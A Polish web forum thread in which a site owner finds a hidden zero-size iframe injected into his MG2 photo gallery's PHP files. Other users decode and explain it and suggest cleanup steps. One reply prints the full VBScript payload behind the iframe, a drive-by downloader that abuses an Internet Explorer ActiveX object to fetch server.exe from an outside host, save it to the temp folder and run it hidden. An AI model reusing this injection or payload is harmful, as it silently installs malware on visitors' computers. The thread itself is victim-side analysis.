hack galerii

[Oakhallow]

Dzisiaj zauważyłem, że w mojej galerii, MG2, coś się zaczęło krzaczyć. Szybkie śledztwo wykazało, że w plikach głównych php pojawił się na samym początku dziwny wpis:
iframe src='http://thevip.oicp.net/info.html' width=0 height=0></iframe

Po usunięciu wszystko wróciło do normy. Czy ktoś się może orientuje co to za ustrojstwo??

Oakhallow

[muflon]

Na oko jakiś exploit do IE (VBscript, bytecode). No, coś co zamienia komputer odwiedzającego w wysyłające spam zombie... albo inne takie :-D

[ags]

Jakby komuś była treść potrzebna:
on error resume next dl = "http://thevip.oicp.net/server.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") str5="Adodb.Stream" set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="521.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0

[Oakhallow]

ags a możesz jakoś ludzkim językiem

Czy można było to zrobić beż fizycznego wejścia na ftp?? Czy ktoś po prostu buszował po moim serwerze??

Oakhallow

[muflon]

"Po ludzku" oznacza to, ze przeglądającemu stronę zainstaluje się w systemie programik http://thevip.oicp.net/server.exe i będzie się uruchamiał przy każdym starcie systemu. Co może robić taki soft, już napisałem wyżej.

Jeśli pytasz jak ktoś tam wrzucił to świństwo... no hmm, google na hasło "mg2 security" wyrzucają całkiem sporo ciekawych informacji Wystarczy jakiś drobny błąd w skrypcie.

[Oakhallow]

Dzięki Muflon.
Wniosek chyba jest taki, że należałoby zrezygnować z tego skryptu.

A mam jeszcze takie pytanko.
Otwierałem swoją galerię FF, ale kiedy pojawił się błąd otworzyłem też IE żeby sprawdzić czy nie rozjechało się coś tylko pod FF. Mam xp ze pełnym kompletem aktualizacji, NOD32 i Outposta. Czy mam problem??

Oakhallow

[muflon]

Czy mam problem??

To już pytanie nie do mnie... nie jestem na bieżąco jeśli chodzi o aktualności w temacie spyware, botnetów itp. Ja bym do tego podszedł z grubej rury, uruchamiając obok jakiś monitor sieci i patrząc co robi. Jeśli "coś jest" to na >50% działa to jako zombie wysyłające spam, teraz to najmodniejszy trend. Myślę że na pewno są jakieś programy, które to wykrywają, jacyś spece od Windows na pewno Ci coś doradzą.

[ags]

Przepraszam za taką treść, ale nie miałem czasu tego nawet połamać, tylko wydrukowałem literki z kodów ascii z tego skryptu. Zobacz, czy nie masz w ctrl-alt-del 521.com albo server.exe. Ew chwilę po starcie systemu nic nie rób, tylko włącz sobie start -> uruchom -> cmd [enter] i netstat. Jeżeli będą jakieś połączenia, to już jest podejrzane. Proponuję przeskanować Spybot S&D i AdAwarem (bo oba darmowe).

[muflon]

Ewentualnie można jeszcze zobaczyć czy nic podejrzanego nie uruchamia się przy starcie, z rejestru, to są klucze /HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run, RunOnce, Runservices, RunServicesOnce i podobne w pozostałych HKEY_* najwyższego poziomu. Ale dobry exploit będzie potrafił się schować zarówno przed netstatem jak i przed regeditem

(te klucze rejestru pisane z pamięci, mogłem się gdzieś machnąć ;-))

[Oakhallow]

Tam gdzie otwierałem strone na IE zrobiłem na wszelki wypadek format c:, a na drugim otwierałem tylko pod FF, co mam nadzieję wyklucza infekcję.

Swoją drogą jest nauczka, że nie wolno do stref zaufanych wrzucać własnych stron i należy je traktować jak każdą inną w necie, czyli z dużą dozą ostrożności.

Oakhallow